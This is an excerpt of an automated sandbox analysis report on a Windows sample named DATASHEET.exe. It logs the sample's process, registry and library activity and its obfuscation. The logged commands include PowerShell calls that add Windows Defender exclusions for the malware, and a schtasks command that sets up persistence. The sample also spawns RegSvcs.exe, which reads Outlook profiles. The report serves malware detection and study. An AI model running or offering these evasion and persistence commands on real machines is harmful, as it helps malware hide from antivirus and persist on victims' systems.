                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\DATASHEET.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: DATASHEET.exeReversingLabs: Detection: 55%
                    Source: DATASHEET.exeVirustotal: Detection: 47%
                    Source: C:\Users\user\Desktop\DATASHEET.exeFile read: C:\Users\user\Desktop\DATASHEET.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\DATASHEET.exe "C:\Users\user\Desktop\DATASHEET.exe"
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp9C6E.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp9C6E.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\DATASHEET.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\DATASHEET.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: DATASHEET.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: DATASHEET.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: DATASHEET.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: Aezq.pdb source: DATASHEET.exe, jwvzGqkYNEejno.exe.0.dr
                    Source: Binary string: Aezq.pdbSHA256 source: DATASHEET.exe, jwvzGqkYNEejno.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: DATASHEET.exe, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: jwvzGqkYNEejno.exe.0.dr, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, AMPI2OQw9LBFRkO0xI.cs.Net Code: xIvA5etdBM System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.DATASHEET.exe.3f39880.1.raw.unpack, AMPI2OQw9LBFRkO0xI.cs.Net Code: xIvA5etdBM System.Reflection.Assembly.Load(byte[])
                    Source: DATASHEET.exeStatic PE information: 0xAF0C1E0E [Tue Jan 23 19:42:06 2063 UTC]
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 0_2_02B2E768 push esp; retf 0_2_02B2E769
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_0281C607 push es; iretd 9_2_0281C616
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_0281C488 push cs; iretd 9_2_0281C496
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 9_2_0281AAF6 push ecx; iretd 9_2_0281AAF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016D0C55 push edi; retf 13_2_016D0C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06D25FEB push FFFFFF8Bh; iretd 13_2_06D25FF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06D2E8FF push ss; retf 13_2_06D2E902
                    Source: DATASHEET.exeStatic PE information: section name: .text entropy: 7.976677778688236
                    Source: jwvzGqkYNEejno.exe.0.drStatic PE information: section name: .text entropy: 7.976677778688236
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, DigqPdeF2Byu3IrVKo.csHigh entropy of concatenated method names: 'JxN53qQlS', 'NISTSKwmx', 'xcFbKNDfg', 'C68OZOY2g', 'pDBKPvgAV', 'Hht2feTo8', 'TgMBuPNLEeHMTXNgCB', 'eDTgBYHnboRfP1LSUc', 'sxSwcKHp1', 'HH2vxif6W'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, QE8Pv79ocLOef81dvY.csHigh entropy of concatenated method names: 'VMcF3hOvBq', 'pC7FJgjNW9', 'w0AF5Xuj0n', 'fWtFTcwAKl', 'zh2FDes6ta', 'ucLFbI2B4R', 'zbfFOdkG7v', 'eVqFC2Z7yV', 'g9aFKvZNQv', 'EIPF2IsxFs'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, KaFIOWXPcSfy2l8Ts8.csHigh entropy of concatenated method names: 'c69uCjUJ18', 'O5KuKOpRcP', 'qjduVLPRyq', 'SpKule8AEq', 'PtWuZxLCPZ', 'Bl8u075qXQ', 'MFau4NDCYa', 'wWnunOsrfh', 'HTLuh9sZ83', 'EI0uLpMKgv'
                    Source: 0.2.DATASHEET.exe.7dc0000.5.raw.unpack, MjyTDcEikv92nHoltS.csHigh entropy of concatenated method names: 'Yd6thm19yV', 'vlVtgtqpp4', 'xrmtEKpAYW', 'qo0tSU898H', 'H7ntlhpEu1', 'd5utprsGJH', 'vSOtZat6Ga', 'q05t0eihnI', 'txCtmpWNER', 'R4qt49qhh2'
